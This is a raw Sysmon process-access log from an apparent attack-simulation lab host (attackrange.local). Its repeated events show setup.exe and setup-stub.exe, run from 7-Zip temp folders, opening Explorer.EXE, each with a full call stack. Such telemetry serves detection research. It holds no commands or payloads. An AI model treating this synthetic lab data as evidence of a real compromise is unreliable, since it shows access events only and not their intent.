13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000014653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.